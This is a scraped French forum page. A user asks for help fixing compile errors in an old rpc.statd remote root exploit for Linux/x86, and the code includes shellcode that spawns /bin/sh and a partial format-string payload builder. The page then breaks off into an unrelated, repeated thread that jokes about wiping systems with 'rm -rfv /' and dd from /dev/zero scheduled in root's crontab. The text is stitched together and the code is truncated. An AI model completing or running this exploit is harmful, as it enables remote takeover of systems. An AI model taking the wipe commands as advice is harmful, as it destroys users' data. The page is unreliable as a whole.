j ai ce code en c
j ai plein de warning pas grave
mais j ai des errors que je ne sans pas corrige pouvez vous m aider
gcc -o output_file -Wall output_file.c
/*
* rpc.statd remote root xploit for linux/x86
* based on the xploit made by drow for linux/PowerPC
*
* Author: Doing, 08/2000
*
* NOTE:
* The guest of the remote address of the saved EIP and local vars
* is still a problem. The value showed on the usage worked
* fine on mi suse with the compiled sources. With gdb and a little
* patience you should get the address for your distro/version.
* Some address doesn't work, because they cause a very long result,
* and the syslog() function overflows itself when parsing the
* format input :(
*
* Greetz to Pascal Bouchareine for that great paper on format bugs :)
*
* Y saludos a los canales #phreak y #hacker_novatos del IRC hispano :P
*
* Excuse my poor english :-)
*
*/
void usage(char *s) {
printf("rpc.statd xploit for linux/x86 - Doing <jdoing@bigfoot.com>\n");
printf("Usage: %s host address command\n", s);
printf("host\t: the targe host\n");
printf("address\t: the address of the buffer in function log()\n");
printf("command\t: command to run remotely\n\n");
printf("ej:%s 127.0.0.1 0xbffff3d4 \"/usr/X11R6/bin/xterm
-ut-display127.0.0.1:0\"\n\n", s);
printf("Enjoy!\n");
exit(0);
}
/*
shellcode without cr/lf and control caracters
*/
char *code =
"\xeb\x4b\x5e\x89\x76\xac\x83\xee\x20\x8d\x5e\x28\x83\xc6\x20\x89"
"\x5e\xb0\x83\xee\x20\x8d\x5e\x2e\x83\xc6\x20\x83\xc3\x20\x83\xeb"
"\x23\x89\x5e\xb4\x31\xc0\x83\xee\x20\x88\x46\x27\x88\x46\x2a\x83"
"\xc6\x20\x88\x46\xab\x89\x46\xb8\xb0\x2b\x2c\x20\x89\xf3\x8d\x4e"
"\xac\x8d\x56\xb8\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xb0\xff"
"\xff\xff/bin/sh -c ";
char shellcode[4096];
void make_shellcode(char *cdir, char *cmd)
{
unsigned long dir, ret;
int c, eat = 14;
int first_n = 0xc9;
char tmp[1024];
int i, i0, i1, i2;
char *ptr = shellcode;
memset(shellcode, 0, 4096);
sscanf(cdir, "%x", &dir);
ret = dir + 0xd0 - 20; /* put ret address into nop-space :) */
dir += 1028; /* dir = address of saved EIP = address of buffer +
1024 bytes of buffer + 4 bytes of SFP */
i = (ret & 0xff00) >> 8;
if (i > i0) sprintf(ptr, "%%0%ix%%n", i - i0);
if (i == i0) sprintf(ptr, "%%n");
if (i < i0) {
i |= 0x0100;
sprintf(ptr, "%%0%ix%%n", i - i0);
}
ptr = &shellcode[strlen(shellcode)];
le 19/01/2006 à 12:00, Harpo a écrit dans le message <43cf7151$0$20172$ :
Au fait, quand on fait 'rm -rfv /', ça s'arrête à quel moment ?
À la fin. J'ai fait une fois un « rm -fr tmp/ * » alors que j'étais root et dans « / » ; cet espace m'a coûté cher (en temps -- car comme tout le monde j'avais une sauvegarde toute fraîche ;-)).
Bien sûr, tu sais que backup et restore sont les 2 mammelles de l'informatique et non plantage et garbage
Dans ces cas là, il y a des outils qui permettent de sauver quelques meubles, le meilleur que j'ai trouvé c'est grep sur /dev/leDisque.
Depuis, sous root, je fais beaucoup plus attention avant d'appuyer sur la touche « Enter ».
Eviter d'être sous root fait gagner beaucoup de temps, parfois.
newfs, mkfs ou format sont aussi très amusants et surtout bien plus rapides. ;-)
Mais il ne font que des dégâts limités.
Pour un nettoyage en profondeur les grandes marques recommandent « dd ». À appliquer délicatement avec /dev/zero directement sur le disque sale, c'est plus long mais c'est vraiment efficace. On peut mettre ça dans la crontab de root pour avoir un nettoyage régulier (at(1) peut faire l'affaire).
C'est certain, mais dd est aussi très efficace si on ne cherche pas la propreté absolue. Pour certains backups, j'utilise 'dd if=/dev/hda10 of=/dev/hda11 bs=size (pour size, prendre la taille d'un cylindre ou un diviseur ou un multiple, ça dépend du kilométrage de ta machine) hda10 est le système, hda11 le backup (évidemment à changer selon les convenance), il faut qu'ils aient le même filesystem type et la même taille et si possible alignés sur des frontières de cylindre. Si tu es sur hda10 pendant le backup, il faudrait arrêter tous les daemons avant, mais c'est surtout une considération rhétorique, il suffit de faire un 'sync' avant.
Ceci dit, il faudrait arrêter de troller sur fclc !
-- http://harpo.free.fr/
Benoit Izac wrote:
Bonjour,
le 19/01/2006 à 12:00, Harpo a écrit
dans le message <43cf7151$0$20172$8fcfb975@news.wanadoo.fr> :
Au fait, quand on fait 'rm -rfv /', ça s'arrête à quel moment ?
À la fin. J'ai fait une fois un « rm -fr tmp/ * » alors que j'étais
root et dans « / » ; cet espace m'a coûté cher (en temps -- car comme
tout le monde j'avais une sauvegarde toute fraîche ;-)).
Bien sûr, tu sais que backup et restore sont les 2 mammelles de
l'informatique et non plantage et garbage
Dans ces cas là, il y a des outils qui permettent de sauver quelques
meubles, le meilleur que j'ai trouvé c'est grep sur /dev/leDisque.
Depuis, sous
root, je fais beaucoup plus attention avant d'appuyer sur la touche «
Enter ».
Eviter d'être sous root fait gagner beaucoup de temps, parfois.
newfs, mkfs ou format sont aussi très amusants et surtout bien plus
rapides. ;-)
Mais il ne font que des dégâts limités.
Pour un nettoyage en profondeur les grandes marques recommandent
« dd ». À appliquer délicatement avec /dev/zero directement sur le
disque sale, c'est plus long mais c'est vraiment efficace. On peut
mettre ça dans la crontab de root pour avoir un nettoyage régulier
(at(1) peut faire l'affaire).
C'est certain, mais dd est aussi très efficace si on ne cherche pas la
propreté absolue.
Pour certains backups, j'utilise 'dd if=/dev/hda10 of=/dev/hda11 bs=size
(pour size, prendre la taille d'un cylindre ou un diviseur ou un
multiple, ça dépend du kilométrage de ta machine)
hda10 est le système, hda11 le backup (évidemment à changer selon les
convenance), il faut qu'ils aient le même filesystem type et la même
taille et si possible alignés sur des frontières de cylindre.
Si tu es sur hda10 pendant le backup, il faudrait arrêter tous les
daemons avant, mais c'est surtout une considération rhétorique, il
suffit de faire un 'sync' avant.
Ceci dit, il faudrait arrêter de troller sur fclc !
le 19/01/2006 à 12:00, Harpo a écrit dans le message <43cf7151$0$20172$ :
Au fait, quand on fait 'rm -rfv /', ça s'arrête à quel moment ?
À la fin. J'ai fait une fois un « rm -fr tmp/ * » alors que j'étais root et dans « / » ; cet espace m'a coûté cher (en temps -- car comme tout le monde j'avais une sauvegarde toute fraîche ;-)).
Bien sûr, tu sais que backup et restore sont les 2 mammelles de l'informatique et non plantage et garbage
Dans ces cas là, il y a des outils qui permettent de sauver quelques meubles, le meilleur que j'ai trouvé c'est grep sur /dev/leDisque.
Depuis, sous root, je fais beaucoup plus attention avant d'appuyer sur la touche « Enter ».
Eviter d'être sous root fait gagner beaucoup de temps, parfois.
newfs, mkfs ou format sont aussi très amusants et surtout bien plus rapides. ;-)
Mais il ne font que des dégâts limités.
Pour un nettoyage en profondeur les grandes marques recommandent « dd ». À appliquer délicatement avec /dev/zero directement sur le disque sale, c'est plus long mais c'est vraiment efficace. On peut mettre ça dans la crontab de root pour avoir un nettoyage régulier (at(1) peut faire l'affaire).
C'est certain, mais dd est aussi très efficace si on ne cherche pas la propreté absolue. Pour certains backups, j'utilise 'dd if=/dev/hda10 of=/dev/hda11 bs=size (pour size, prendre la taille d'un cylindre ou un diviseur ou un multiple, ça dépend du kilométrage de ta machine) hda10 est le système, hda11 le backup (évidemment à changer selon les convenance), il faut qu'ils aient le même filesystem type et la même taille et si possible alignés sur des frontières de cylindre. Si tu es sur hda10 pendant le backup, il faudrait arrêter tous les daemons avant, mais c'est surtout une considération rhétorique, il suffit de faire un 'sync' avant.
Ceci dit, il faudrait arrêter de troller sur fclc !
-- http://harpo.free.fr/
Targeur fou
Etienne de Tocqueville wrote:
Benoit Izac writes:
le 19/01/2006 à 12:00, Harpo a écrit dans le message <43cf7151$0$20172$ :
Au fait, quand on fait 'rm -rfv /', ça s'arrête à quel moment ?
À la fin.
Moi, je dirais que ça s'arretera avant... S'il y a quelques deamons qui tournent, il y en a bien un qui se décidera à mettre le noyau en pani c !
Mais bon, c'est pas le tout de tergiverser, j'ai lancé la commande et je vous donnerais le résultat dès qu